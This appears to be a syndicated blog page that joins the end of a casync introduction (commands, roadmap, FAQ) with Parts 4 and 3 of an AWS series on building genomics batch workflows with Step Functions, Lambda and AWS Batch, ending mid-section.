$ casync make foobar.caidx --with=sec-time --with=symlinks --with=read-only /some/dir

This command will create a chunk index for a file tree serialization
that has three features above the absolute baseline supported: 1s
granularity time-stamps, symbolic links and a single read-only bit. In
this mode, all the other meta-data bits are not stored, including
nanosecond time-stamps, full UNIX permission bits, file ownership or
even ACLs or extended attributes.

Now let’s make a .caidx file available locally as a mounted file
system, without extracting it:

$ casync mount http://example.com/images/foobar.caidx /mnt/foobar

And similar, let’s make a .caibx file available locally as a block device:

$ casync mkdev http://example.com/images/foobar.caibx

This will create a block device in /dev and print the used device
node path to STDOUT.

As mentioned, casync is big on reproducibility. Let’s make use of
that to calculate a digest identifying a very specific version of
a file tree:

$ casync digest .

This digest will include all meta-data bits casync and the underlying
file system know about. Usually, to make this useful you want to
configure exactly what meta-data to include:

$ casync digest --with=unix .

This makes use of the --with=unix shortcut for selecting meta-data
fields. Specifying --with=unix selects all meta-data that
traditional UNIX file systems support. It is a shortcut for writing out:
--with=16bit-uids --with=permissions --with=sec-time --with=symlinks
--with=device-nodes --with=fifos --with=sockets.

Note that when calculating digests or creating chunk indexes you may
also use the negative --without= option to start from the most precise
set of meta-data and remove specific features:

$ casync digest --without=flag-immutable

This generates a digest with the most accurate meta-data, but leaves
one feature out: chattr(1)‘s
immutable (+i) file flag.

To list the contents of a .caidx file use a command like the following:

$ casync list http://example.com/images/foobar.caidx

or

$ casync mtree http://example.com/images/foobar.caidx

The former command will generate a brief list of files and
directories, not too different from tar t or ls -al in its
output. The latter command will generate a BSD
mtree(5) compatible
manifest. Note that casync actually stores substantially more file
meta-data than mtree files can express, though.

What casync isn’t

  1. casync is not an attempt to minimize serialization and downloaded
    deltas to the extreme. Instead, the tool is supposed to find a good
    middle ground, that is good on traffic and disk space, but not at the
    price of convenience or requiring explicit revision control. If you
    care about updates that are absolutely minimal, there are binary delta
    systems around that might be an option for you, such as Google’s
    Courgette.

  2. casync is not a replacement for rsync, git, zsync or
    anything like that. They have very different use-cases and
    semantics. For example, rsync permits you to directly synchronize two
    file trees remotely. casync just cannot do that, and it is unlikely
    it ever will.

Where next?

casync is supposed to be a generic synchronization tool. Its primary
focus for now is delivery of OS images, but I’d like to make it useful
for a couple other use-cases, too. Specifically:

  1. To make the tool useful for backups, encryption is missing. I have
    pretty concrete plans how to add that. When implemented, the tool
    might become an alternative to restic,
    BorgBackup or
    tarsnap.

  2. Right now, if you want to deploy casync in real-life, you still
    need to validate the downloaded .caidx or .caibx file yourself, for
    example with some gpg signature. It is my intention to integrate with
    gpg in a minimal way so that signing and verifying chunk index files
    is done automatically.

  3. In the longer run, I’d like to build an automatic synchronizer for
    $HOME between systems from this. Each $HOME instance would be
    stored automatically at regular intervals in the cloud using casync,
    and conflicts would be resolved locally.

  4. casync is written in a shared library style, but it is not yet
    built as one. Specifically this means that almost all of casync‘s
    functionality is supposed to be available as C API soon, and
    applications can process casync files on every level. It is my
    intention to make this library useful enough so that it will be easy
    to write a module for GNOME’s gvfs subsystem in order to make remote
    or local .caidx files directly available to applications (as an
    alternative to casync mount). In fact the idea is to make this all
    flexible enough that even the remoting back-ends can be replaced
    easily, for example to replace casync‘s default HTTP/HTTPS back-ends
    built on CURL with GNOME’s own HTTP implementation, in order to share
    cookies, certificates, … There’s also an alternative method to
    integrate with casync in place already: simply invoke casync as a
    sub-process. casync will inform you about a certain set of state
    changes using a mechanism compatible with
    sd_notify(3). In
    future it will also propagate progress data this way and more.

  5. I intend to add a new seeding back-end that sources chunks from
    the local network. After downloading the new .caidx file off the
    Internet casync would then search for the listed chunks on the local
    network first before retrieving them from the Internet. This should
    speed things up on all installations that have multiple similar
    systems deployed in the same network.

Further plans are listed tersely in the
TODO file.

FAQ:

  1. Is this a systemd project? — casync is hosted under the
    GitHub systemd umbrella, and the
    projects share the same coding style. However, the code-bases are
    distinct and without interdependencies, and casync works fine both
    on systemd systems and systems without it.

  2. Is casync portable? — At the moment: no. I only run Linux and
    that’s what I code for. That said, I am open to accepting portability
    patches (unlike for systemd, which doesn’t really make sense on
    non-Linux systems), as long as they don’t interfere too much with the
    way casync works. Specifically this means that I am not too
    enthusiastic about merging portability patches for OSes lacking the
    openat(2) family
    of APIs.

  3. Does casync require reflink-capable file systems to work, such
    as btrfs?
    — No it doesn’t. The reflink magic in casync is
    employed when the file system permits it, and it’s good to have it,
    but it’s not a requirement, and casync will implicitly fall back to
    copying when it isn’t available. Note that casync supports a number
    of file system features on a variety of file systems that aren’t
    available everywhere, for example FAT’s system/hidden file flags or
    xfs‘s projinherit file flag.

  4. Is casync stable? — I just tagged the first, initial
    release. While I have been working on it for quite some time and it
    is quite featureful, this is the first time I am advertising it
    publicly, and it has hence received very little testing outside of its
    own test suite. I am also not fully ready to commit to the stability
    of the current serialization or chunk index format. I don’t see any
    breakages coming for it though. casync is pretty light on
    documentation right now, and does not even have a man page. I intend
    to correct that soon.

  5. Are the .caidx/.caibx and .catar file formats open and
    documented?
    casync is Open Source, so if you want to know the
    precise format, have a look at the sources for now. It’s definitely my
    intention to add comprehensive docs for both formats however. Don’t
    forget this is just the initial version right now.

  6. casync is just like $SOMEOTHERTOOL! Why are you reinventing
    the wheel (again)?
    — Well, because casync isn’t “just like” some
    other tool. I am pretty sure I did my homework, and that there is no
    tool just like casync right now. The tools coming closest are probably
    rsync, zsync, tarsnap, restic, but they are quite different beasts
    each.

  7. Why did you invent your own serialization format for file trees?
    Why don’t you just use tar?
    — That’s a good question, and other
    systems — most prominently tarsnap — do that. However, as mentioned
    above tar doesn’t enforce reproducibility. It also doesn’t really do
    random access: if you want to access some specific file you need to
    read every single byte stored before it in the tar archive to find
    it, which is of course very expensive. The serialization casync
    implements places a focus on reproducibility, random access, and
    meta-data control. Much like traditional tar it can still be
    generated and extracted in a stream fashion though.

  8. Does casync save/restore SELinux/SMACK file labels? — At the
    moment, no. That’s not because I wouldn’t want it to, but simply
    because I am not a guru of either of these systems, and didn’t want to
    implement something I do not fully grok and cannot test. If you look at
    the sources you’ll find that there are already some definitions in place
    that keep room for them though. I’d be delighted to accept a patch
    implementing this fully.

  9. What about delivering squashfs images? How well does chunking
    work on compressed serializations?
    – That’s a very good point!
    Usually, if you apply a chunking algorithm to a compressed data
    stream (let’s say a tar.gz file), then changing a single bit at the
    front will propagate into the entire remainder of the file, so that
    minimal changes will explode into major changes. Thankfully this
    doesn’t apply that strictly to squashfs images, as it provides
    random access to files and directories and thus breaks up the
    compression streams at regular intervals to make seeking easy. This
    fact is beneficial for systems employing chunking, such as casync, as
    this means single-bit changes might affect their vicinity but will not
    explode in an unbounded fashion (see the small illustrative sketch
    after this FAQ). In order to achieve the best results when
    delivering squashfs images through casync the block sizes of
    squashfs and the chunk sizes of casync should be matched up
    (using casync‘s --chunk-size= option). How precisely to choose
    both values is left as a research subject for the user, for now.

  10. What does the name casync mean? – It’s a synchronizing
    tool, hence the -sync suffix, following rsync‘s naming. It makes
    use of the content-addressable concept of git, hence the ca-
    prefix.

  11. Where can I get this stuff? Is it already packaged? – Check
    out the sources on GitHub. I just tagged the first version. Martin
    Pitt has packaged casync for Ubuntu. There is also an ArchLinux
    package. Zbigniew Jędrzejewski-Szmek has prepared a Fedora RPM that
    hopefully will soon be included in the distribution.
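
As a small aside to FAQ item 9 above, here is a deliberately simple and
purely illustrative Python sketch of content-defined chunking. This is not
casync’s actual algorithm (casync uses an efficiently updatable rolling
hash and different size limits); it only demonstrates why a local
modification typically re-aligns chunk boundaries within its vicinity, so
that most chunks of a modified stream still hash identically to chunks of
the original.

import hashlib
import os

WINDOW = 48        # bytes of trailing context used to decide boundaries
MASK = 0x0FFF      # on average one boundary every ~4096 bytes
MIN_CHUNK = 1024   # avoid degenerate, tiny chunks

def chunks(data):
    """Yield SHA-256 digests of content-defined chunks of 'data'."""
    start = 0
    for i in range(len(data)):
        if i - start < MIN_CHUNK:
            continue
        window = data[i - WINDOW:i]
        h = int.from_bytes(hashlib.blake2b(window, digest_size=4).digest(), "big")
        if (h & MASK) == MASK:          # boundary depends only on nearby bytes
            yield hashlib.sha256(data[start:i]).hexdigest()
            start = i
    yield hashlib.sha256(data[start:]).hexdigest()

original = os.urandom(1 << 20)
modified = original[:500000] + b"X" + original[500000:]   # one inserted byte
a, b = set(chunks(original)), set(chunks(modified))
print("chunks shared after a 1-byte insertion: {} of {}".format(len(a & b), len(a)))

Because boundaries depend only on nearby content, the chunks downstream of
the insertion are byte-identical to the original ones and deduplicate,
which is exactly the property that makes chunk-based delivery of
mostly-similar images cheap.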

Should you care? Is this a tool for you?

Well, that’s up to you really. If you are involved with projects that
need to deliver IoT, VM, container, application or OS images, then
maybe this is a great tool for you — but other options exist, some of
which are linked above.

Note that casync is an Open Source project: if it doesn’t do exactly
what you need, prepare a patch that adds what you need, and we’ll
consider it.

If you are interested in the project and would like to talk about this
in person, I’ll be presenting casync soon at Kinvolk’s Linux
Technologies Meetup in Berlin, Germany. You are invited. I also intend
to talk about it at All Systems Go!, also in Berlin.

Building High-Throughput Genomics Batch Workflows on AWS: Workflow Layer (Part 4 of 4)

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/building-high-throughput-genomics-batch-workflows-on-aws-workflow-layer-part-4-of-4/

Aaron Friedman is a Healthcare and Life Sciences Partner Solutions Architect at AWS

Angel Pizarro is a Scientific Computing Technical Business Development Manager at AWS

This post is the fourth in a series on how to build a genomics workflow on AWS. In Part 1, we introduced a general architecture, shown below, and highlighted the three common layers in a batch workflow:

  • Job
  • Batch
  • Workflow

In Part 2, you built a Docker container for each job that needed to run as part of your workflow, and stored them in Amazon ECR.

In Part 3, you tackled the batch layer and built a scalable, elastic, and easily maintainable batch engine using AWS Batch. This solution took care of dynamically scaling your compute resources in response to the number of runnable jobs in your job queue, as well as managing job placement.

In Part 4, you build out the workflow layer of your solution using AWS Step Functions and AWS Lambda. You then run an end-to-end genomic analysis―specifically, an exome secondary analysis―many times, at a cost of less than $1 per exome.

Step Functions makes it easy to coordinate the components of your applications using visual workflows. Building applications from individual components that each perform a single function lets you scale and change your workflow quickly. You can use the graphical console to arrange and visualize the components of your application as a series of steps, which simplifies building and running multi-step applications. You can change and add steps without writing code, so you can easily evolve your application and innovate faster.

An added benefit of using Step Functions to define your workflows is that the state machines you create are immutable. While you can delete a state machine, you cannot alter it after it is created. For regulated workloads where auditing is important, you can be assured that state machines you used in production cannot be altered.

In this blog post, you will create a Lambda state machine to orchestrate your batch workflow. For more information on how to create a basic state machine, please see this Step Functions tutorial.

All code related to this blog series can be found in the associated GitHub repository here.

Build a state machine building block

To skip the following steps, we have provided an AWS CloudFormation template that can deploy your Step Functions state machine. You can use this in combination with the setup you did in part 3 to quickly set up the environment in which to run your analysis.

The state machine is composed of smaller state machines that submit a job to AWS Batch, and then poll and check its execution.

The steps in this building block state machine are as follows:

  1. A job is submitted.
    Each analytical module/job has its own Lambda function for submission and calls the batchSubmitJob Lambda function that you built in the previous blog post. You will build these specialized Lambda functions in the following section.
  2. The state machine queries the AWS Batch API for the job status.
    This is also a Lambda function.
  3. The job status is checked to see if the job has completed.
    If the job status equals SUCCEEDED, proceed to log the final job status. If the job status equals FAILED, end the execution of the state machine. In all other cases, wait 30 seconds and go back to Step 2.

Here is the JSON representing this state machine.

{
  "Comment": "A simple example that submits a Job to AWS Batch",
  "StartAt": "SubmitJob",
  "States": {
    "SubmitJob": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>::function:batchSubmitJob",
      "Next": "GetJobStatus"
    },
    "GetJobStatus": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchGetJobStatus",
      "Next": "CheckJobStatus",
      "InputPath": "$",
      "ResultPath": "$.status"
    },
    "CheckJobStatus": {
      "Type": "Choice",
      "Choices": [
        {
          "Variable": "$.status",
          "StringEquals": "FAILED",
          "End": true
        },
        {
          "Variable": "$.status",
          "StringEquals": "SUCCEEDED",
          "Next": "GetFinalJobStatus"
        }
      ],
      "Default": "Wait30Seconds"
    },
    "Wait30Seconds": {
      "Type": "Wait",
      "Seconds": 30,
      "Next": "GetJobStatus"
    },
    "GetFinalJobStatus": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchGetJobStatus",
      "End": true
    }
  }
}
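
If you prefer to create and execute this building block programmatically
instead of through the console, a minimal boto3 sketch could look like the
following. The file name, role ARN, and input are placeholders for
illustration; the definition is the JSON shown above.

import json

import boto3

sfn = boto3.client('stepfunctions', region_name='us-east-1')

# Read the state machine definition shown above (hypothetical file name).
with open('submit_and_poll.json') as f:
    definition = f.read()

state_machine = sfn.create_state_machine(
    name='BatchJobSubmitAndPoll',
    definition=definition,
    roleArn='arn:aws:iam::<account-id>:role/StatesExecutionRole'  # placeholder role
)

execution = sfn.start_execution(
    stateMachineArn=state_machine['stateMachineArn'],
    input=json.dumps({
        'jobName': 'test-job',                 # illustrative input for batchSubmitJob
        'jobQueue': 'highPriority-myenv',
        'jobDefinition': 'isaac-myenv:1'
    })
)
print(execution['executionArn'])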

Building the Lambda functions for the state machine

You need two basic Lambda functions for this state machine. The first one submits a job to AWS Batch and the second checks the status of the AWS Batch job that was submitted.

In AWS Step Functions, you specify an input as JSON that is read into your state machine. Each state receives the aggregate of the steps immediately preceding it, and you can specify which components a state passes on to its children. Because you are using Lambda functions to execute tasks, one of the easiest routes to take is to modify the input JSON, represented as a Python dictionary, within the Lambda function and return the entire dictionary back for the next state to consume.

Building the batchSubmitIsaacJob Lambda function

For Step 1 above, you need a Lambda function for each of the steps in your analysis workflow. As you created a generic Lambda function in the previous post to submit a batch job (batchSubmitJob), you can use that function as the basis for the specialized functions you’ll include in this state machine. Here is such a Lambda function for the Isaac aligner.

from __future__ import print_function

import boto3
import json
import traceback

lambda_client = boto3.client('lambda')



def lambda_handler(event, context):
    try:
        # Generate output path
        bam_s3_path = '/'.join([event['resultsS3Path'], event['sampleId'], 'bam/'])

        depends_on = event['dependsOn'] if 'dependsOn' in event else []

        # Generate run command
        command = [
            '--bam_s3_folder_path', bam_s3_path,
            '--fastq1_s3_path', event['fastq1S3Path'],
            '--fastq2_s3_path', event['fastq2S3Path'],
            '--reference_s3_path', event['isaac']['referenceS3Path'],
            '--working_dir', event['workingDir']
        ]

        if 'cmdArgs' in event['isaac']:
            command.extend(['--cmd_args', event['isaac']['cmdArgs']])
        if 'memory' in event['isaac']:
            command.extend(['--memory', event['isaac']['memory']])

        # Submit Payload
        response = lambda_client.invoke(
            FunctionName='batchSubmitJob',
            InvocationType='RequestResponse',
            LogType='Tail',
            Payload=json.dumps(dict(
                dependsOn=depends_on,
                containerOverrides={
                    'command': command,
                },
                jobDefinition=event['isaac']['jobDefinition'],
                jobName='-'.join(['isaac', event['sampleId']]),
                jobQueue=event['isaac']['jobQueue']
            )))

        response_payload = response['Payload'].read()

        # Update event
        event['bamS3Path'] = bam_s3_path
        event['jobId'] = json.loads(response_payload)['jobId']
        
        return event
    except Exception as e:
        traceback.print_exc()
        raise e

In the Lambda console, create a Python 2.7 Lambda function named batchSubmitIsaacJob and paste in the above code. Use the LambdaBatchExecutionRole that you created in the previous post. For more information, see Step 2.1: Create a Hello World Lambda Function.

This Lambda function reads in the inputs passed to the state machine it is part of, formats the data for the batchSubmitJob Lambda function, invokes that Lambda function, and then modifies the event dictionary to pass onto the subsequent states. You can repeat these for each of the other tools, which can be found in the tools//lambda/lambda_function.py script in the GitHub repo.

Building the batchGetJobStatus Lambda function

For Step 2 above, the process queries the AWS Batch DescribeJobs API action with jobId to identify the state that the job is in. You can put this into a Lambda function to integrate it with Step Functions.

In the Lambda console, create a new Python 2.7 function with the LambdaBatchExecutionRole IAM role. Name your function batchGetJobStatus and paste in the following code. This is similar to the batch-get-job-python27 Lambda blueprint.

from __future__ import print_function

import boto3
import json

print('Loading function')

batch_client = boto3.client('batch')

def lambda_handler(event, context):
    # Log the received event
    print("Received event: " + json.dumps(event, indent=2))
    # Get jobId from the event
    job_id = event['jobId']

    try:
        response = batch_client.describe_jobs(
            jobs=[job_id]
        )
        job_status = response['jobs'][0]['status']
        return job_status
    except Exception as e:
        print(e)
        message = 'Error getting Batch Job status'
        print(message)
        raise Exception(message)

Structuring state machine input

You have structured the state machine input so that general file references are included at the top-level of the JSON object, and any job-specific items are contained within a nested JSON object. At a high level, this is what the input structure looks like:

{
        "general_field_1": "value1",
        "general_field_2": "value2",
        "general_field_3": "value3",
        "job1": {},
        "job2": {},
        "job3": {}
}

Building the full state machine

By chaining these state machine components together, you can quickly build flexible workflows that can process genomes in multiple ways. The development of the larger state machine that defines the entire workflow uses four of the above building blocks. You use the Lambda functions that you built in the previous section. Rename each building block submission to match the tool name.

We have provided a CloudFormation template to deploy your state machine and the associated IAM roles. In the CloudFormation console, select Create Stack, choose your template (deploy_state_machine.yaml), and enter in the ARNs for the Lambda functions you created.

Continue through the rest of the steps and deploy your stack. Be sure to check the box next to "I acknowledge that AWS CloudFormation might create IAM resources."

Once the CloudFormation stack is finished deploying, you should see the following image of your state machine.

In short, you first submit a job for Isaac, which is the aligner you are using for the analysis. Next, you use a Parallel state to split your output from "GetFinalIsaacJobStatus" and send it to both your variant calling step, Strelka, and your QC step, Samtools Stats. These then run in parallel, and you annotate the results from your Strelka step with snpEff. A rough sketch of this parallel structure follows below.
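
While the full workflow definition is generated for you by the
CloudFormation template, the parallel portion conceptually looks something
like the following Amazon States Language fragment, expressed here as a
Python dictionary. The state and Lambda function names are illustrative
and follow the renaming convention described above; the real branches also
contain the status-polling loop shown earlier.

import json

parallel_fragment = {
    "RunStrelkaAndSamtoolsStats": {
        "Type": "Parallel",
        "Branches": [
            {
                "StartAt": "SubmitStrelkaJob",
                "States": {
                    "SubmitStrelkaJob": {
                        "Type": "Task",
                        "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchSubmitStrelkaJob",
                        "End": True   # the real branch continues with polling and snpEff
                    }
                }
            },
            {
                "StartAt": "SubmitSamtoolsStatsJob",
                "States": {
                    "SubmitSamtoolsStatsJob": {
                        "Type": "Task",
                        "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchSubmitSamtoolsStatsJob",
                        "End": True
                    }
                }
            }
        ],
        "End": True
    }
}

print(json.dumps(parallel_fragment, indent=2))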

Putting it all together

Now that you have built all of the components for a genomics secondary analysis workflow, test the entire process.

We have provided sequences from an Illumina sequencer that cover a region of the genome known as the exome. Most of the positions in the genome that we have currently associated with disease or human traits reside in this region, which is 1–2% of the entire genome. The workflow that you have built works for both analyzing an exome, as well as an entire genome.

Additionally, we have provided prebuilt reference genomes for Isaac, located at:

s3://aws-batch-genomics-resources/reference/

If you are interested, we have provided a script that sets up all of that data. To execute that script, run the following command on a large EC2 instance:

make reference REGISTRY=<your-ecr-registry>

Indexing and preparing this reference takes many hours on a large-memory EC2 instance. Be careful about the costs involved and note that the data is available through the prebuilt reference genomes.

Starting the execution

In a previous section, you established the structure of the JSON input that is fed into your state machine. For ease, we have pre-populated the input JSON for the state machine for you. You can also find this in the GitHub repo under workflow/test.input.json:

{
  "fastq1S3Path": "s3://aws-batch-genomics-resources/fastq/SRR1919605_1.fastq.gz",
  "fastq2S3Path": "s3://aws-batch-genomics-resources/fastq/SRR1919605_2.fastq.gz",
  "referenceS3Path": "s3://aws-batch-genomics-resources/reference/hg38.fa",
  "resultsS3Path": "s3://<bucket>/genomic-workflow/results",
  "sampleId": "NA12878_states_1",
  "workingDir": "/scratch",
  "isaac": {
    "jobDefinition": "isaac-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/highPriority-myenv",
    "referenceS3Path": "s3://aws-batch-genomics-resources/reference/isaac/"
  },
  "samtoolsStats": {
    "jobDefinition": "samtools_stats-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/lowPriority-myenv"
  },
  "strelka": {
    "jobDefinition": "strelka-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/highPriority-myenv",
    "cmdArgs": " --exome "
  },
  "snpEff": {
    "jobDefinition": "snpeff-myenv:1",
    "jobQueue": "arn:aws:batch:us-east-1:<account-id>:job-queue/lowPriority-myenv",
    "cmdArgs": " -t hg38 "
  }
}

You are now at the stage to run your full genomic analysis. Copy the above to a new text file, change paths and ARNs to the ones that you created previously, and save your JSON input as input.states.json.

In the CLI, execute the following command. You need the ARN of the state machine that you created in the previous post:

aws stepfunctions start-execution --state-machine-arn <your-state-machine-arn> --input file://input.states.json

Your analysis has now started. By using Spot Instances with AWS Batch, you can quickly scale out your workflows while concurrently optimizing for cost. While this is not guaranteed, most executions of the workflows presented here should cost under $1 for a full analysis.

Monitoring the execution

The output from the above CLI command gives you the ARN that describes the specific execution. Copy that and navigate to the Step Functions console. Select the state machine that you created previously and paste the ARN into the search bar.

The screen shows information about your specific execution. On the left, you see where your execution currently is in the workflow.

In the following screenshot, you can see that your workflow has successfully completed the alignment job and moved onto the subsequent steps, which are variant calling and generating quality information about your sample.

You can also navigate to the AWS Batch console and see that progress of all of your jobs reflected there as well.
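
If you would rather monitor from a script than from the console, a small
boto3 sketch along the following lines can poll the execution. The ARN is
the one returned by the start-execution call above.

import time

import boto3

sfn = boto3.client('stepfunctions', region_name='us-east-1')

def wait_for_execution(execution_arn, poll_seconds=30):
    """Poll a Step Functions execution until it leaves the RUNNING state."""
    while True:
        desc = sfn.describe_execution(executionArn=execution_arn)
        status = desc['status']   # RUNNING, SUCCEEDED, FAILED, TIMED_OUT, ABORTED
        print("Execution status: {}".format(status))
        if status != 'RUNNING':
            return desc
        time.sleep(poll_seconds)

# Example:
# wait_for_execution('arn:aws:states:us-east-1:<account-id>:execution:<state-machine>:<run-name>')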

Finally, after your workflow has completed successfully, check out the S3 path to which you wrote all of your files. If you run an ls --recursive command on the S3 results path specified in the input to your state machine execution (for example, with aws s3 ls --recursive), you should see something similar to the following:

2017-05-02 13:46:32 6475144340 genomic-workflow/results/NA12878_run1/bam/sorted.bam
2017-05-02 13:46:34    7552576 genomic-workflow/results/NA12878_run1/bam/sorted.bam.bai
2017-05-02 13:46:32         45 genomic-workflow/results/NA12878_run1/bam/sorted.bam.md5
2017-05-02 13:53:20      68769 genomic-workflow/results/NA12878_run1/stats/bam_stats.dat
2017-05-02 14:05:12        100 genomic-workflow/results/NA12878_run1/vcf/stats/runStats.tsv
2017-05-02 14:05:12        359 genomic-workflow/results/NA12878_run1/vcf/stats/runStats.xml
2017-05-02 14:05:12  507577928 genomic-workflow/results/NA12878_run1/vcf/variants/genome.S1.vcf.gz
2017-05-02 14:05:12     723144 genomic-workflow/results/NA12878_run1/vcf/variants/genome.S1.vcf.gz.tbi
2017-05-02 14:05:12  507577928 genomic-workflow/results/NA12878_run1/vcf/variants/genome.vcf.gz
2017-05-02 14:05:12     723144 genomic-workflow/results/NA12878_run1/vcf/variants/genome.vcf.gz.tbi
2017-05-02 14:05:12   30783484 genomic-workflow/results/NA12878_run1/vcf/variants/variants.vcf.gz
2017-05-02 14:05:12    1566596 genomic-workflow/results/NA12878_run1/vcf/variants/variants.vcf.gz.tbi

Modifications to the workflow

You have now built and run your genomics workflow. While diving deep into modifications to this architecture are beyond the scope of these posts, we wanted to leave you with several suggestions of how you might modify this workflow to satisfy additional business requirements.

  • Job tracking with Amazon DynamoDB
    In many cases, such as if you are offering Genomics-as-a-Service, you might want to track the state of your jobs with DynamoDB to get fine-grained records of how your jobs are running. This way, you can easily identify the cost of individual jobs and workflows that you run.
  • Resuming from failure
    Both AWS Batch and Step Functions natively support job retries and can cover many of the standard cases where a job might be interrupted. There may be cases, however, where your workflow might fail in a way that is unpredictable. In this case, you can use custom error handling with AWS Step Functions to build out a workflow that is even more resilient. You can also build fail states into your state machine to fail at any point, such as when a batch job fails after a certain number of retries. A small sketch of this pattern follows this list.
  • Invoking Step Functions from Amazon API Gateway
    You can use API Gateway to build an API that acts as a "front door" to Step Functions. You can create a POST method that contains the input JSON to feed into the state machine you built. For more information, see the Implementing Serverless Manual Approval Steps in AWS Step Functions and Amazon API Gateway blog post.
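
As a rough illustration of the custom error handling mentioned above
(state names and error routing here are examples, not part of the workflow
built in this post), a Task state can declare Retry and Catch rules and
route unrecoverable errors to a Fail state:

import json

resilient_task = {
    "SubmitJob": {
        "Type": "Task",
        "Resource": "arn:aws:lambda:us-east-1:<account-id>:function:batchSubmitJob",
        "Retry": [
            {"ErrorEquals": ["States.TaskFailed"], "MaxAttempts": 2, "IntervalSeconds": 30}
        ],
        "Catch": [
            {"ErrorEquals": ["States.ALL"], "Next": "WorkflowFailed"}
        ],
        "Next": "GetJobStatus"
    },
    "WorkflowFailed": {
        "Type": "Fail",
        "Error": "JobSubmissionFailed",
        "Cause": "The batch job could not be submitted after retries."
    }
}

print(json.dumps(resilient_task, indent=2))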

Conclusion

While the approach we have demonstrated in this series has been focused on genomics, it is important to note that this can be generalized to nearly any high-throughput batch workload. We hope that you have found the information useful and that it can serve as a jump-start to building your own batch workloads on AWS with native AWS services.

For more information about how AWS can enable your genomics workloads, be sure to check out the AWS Genomics page.

Please leave any questions and comments below.

Building High-Throughput Genomic Batch Workflows on AWS: Batch Layer (Part 3 of 4)

Post Syndicated from Andy Katz original https://aws.amazon.com/blogs/compute/building-high-throughput-genomic-batch-workflows-on-aws-batch-layer-part-3-of-4/

Aaron Friedman is a Healthcare and Life Sciences Partner Solutions Architect at AWS

Angel Pizarro is a Scientific Computing Technical Business Development Manager at AWS

This post is the third in a series on how to build a genomics workflow on AWS. In Part 1, we introduced a general architecture, shown below, and highlighted the three common layers in a batch workflow:

  • Job
  • Batch
  • Workflow

In Part 2, you built a Docker container for each job that needed to run as part of your workflow, and stored them in Amazon ECR.

In Part 3, you tackle the batch layer and build a scalable, elastic, and easily maintainable batch engine using AWS Batch.

AWS Batch enables developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS. It dynamically provisions the optimal quantity and type of compute resources (for example, CPU or memory optimized instances) based on the volume and specific resource requirements of the batch jobs that you submit. With AWS Batch, you do not need to install and manage your own batch computing software or server clusters, which allows you to focus on analyzing results, such as those of your genomic analysis.

Integrating applications into AWS Batch

If you are new to AWS Batch, we recommend reading Setting Up AWS Batch to ensure that you have the proper permissions and AWS environment.

After you have a working environment, you define several types of resources:

  • IAM roles that provide service permissions
  • A compute environment that launches and terminates compute resources for jobs
  • A custom Amazon Machine Image (AMI)
  • A job queue to submit the units of work and to schedule the appropriate resources within the compute environment to execute those jobs
  • Job definitions that define how to execute an application

After the resources are created, you’ll test the environment and create an AWS Lambda function to send generic jobs to the queue.

This genomics workflow covers the basic steps. For more information, see Getting Started with AWS Batch.

Creating the necessary IAM roles

AWS Batch simplifies batch processing by managing a number of underlying AWS services so that you can focus on your applications. As a result, you create IAM roles that give the service permissions to act on your behalf. In this section, deploy the AWS CloudFormation template included in the GitHub repository and extract the ARNs for later use.

To deploy the stack, go to the top level in the repo with the following command:

aws cloudformation create-stack --template-body file://batch/setup/iam.template.yaml --stack-name iam --capabilities CAPABILITY_NAMED_IAM

You can capture the output from this stack in the Outputs tab in the CloudFormation console:

Creating the compute environment

In AWS Batch, you will set up a managed compute environment. Managed compute environments automatically launch and terminate compute resources on your behalf based on the aggregate resources needed by your jobs, such as vCPU and memory, and simple boundaries that you define.

When defining your compute environment, specify the following:

  • Desired instance types in your environment
  • Min and max vCPUs in the environment
  • The Amazon Machine Image (AMI) to use
  • Percentage value for bids on the Spot Market
  • VPC subnets that can be used

AWS Batch then provisions an elastic and heterogeneous pool of Amazon EC2 instances based on the aggregate resource requirements of jobs sitting in the RUNNABLE state. If a mix of CPU and memory-intensive jobs are ready to run, AWS Batch provisions the appropriate ratio and size of CPU and memory-optimized instances within your environment. For this post, you will use the simplest configuration, in which instance types are set to "optimal" allowing AWS Batch to choose from the latest C, M, and R EC2 instance families.

While you could create this compute environment in the console, we provide the following CLI commands. Replace the subnet IDs and key name with your own private subnets and key, and the image-id with the image you will build in the next section.

ACCOUNTID=<your account id>
SERVICEROLE=<from output in CloudFormation template>
IAMFLEETROLE=<from output in CloudFormation template>
JOBROLEARN=<from output in CloudFormation template>
SUBNETS=<comma delimited list of subnets>
SECGROUPS=<your security groups>
SPOTPER=50 # percentage of on demand
IMAGEID=<ami-id corresponding to the one you created>
INSTANCEROLE=<from output in CloudFormation template>
REGISTRY=${ACCOUNTID}.dkr.ecr.us-east-1.amazonaws.com
KEYNAME=<your key name>
MAXCPU=1024 # max vCPUs in compute environment
ENV=myenv

# Creates the compute environment
aws batch create-compute-environment --compute-environment-name genomicsEnv-$ENV --type MANAGED --state ENABLED --service-role ${SERVICEROLE} --compute-resources type=SPOT,minvCpus=0,maxvCpus=$MAXCPU,desiredvCpus=0,instanceTypes=optimal,imageId=$IMAGEID,subnets=$SUBNETS,securityGroupIds=$SECGROUPS,ec2KeyPair=$KEYNAME,instanceRole=$INSTANCEROLE,bidPercentage=$SPOTPER,spotIamFleetRole=$IAMFLEETROLE
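
Compute environment creation is asynchronous, and job queues can only be
attached to an environment once it reports a VALID status. If you are
scripting the setup, a short boto3 sketch such as this can wait for it
(the environment name matches the one created above):

import time

import boto3

batch = boto3.client('batch', region_name='us-east-1')

def wait_for_compute_environment(name, poll_seconds=10):
    """Block until the AWS Batch compute environment is VALID (or INVALID)."""
    while True:
        envs = batch.describe_compute_environments(computeEnvironments=[name])
        status = envs['computeEnvironments'][0]['status']   # CREATING, VALID, INVALID, ...
        print("{}: {}".format(name, status))
        if status in ('VALID', 'INVALID'):
            return status
        time.sleep(poll_seconds)

# Example:
# wait_for_compute_environment('genomicsEnv-myenv')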

Creating the custom AMI for AWS Batch

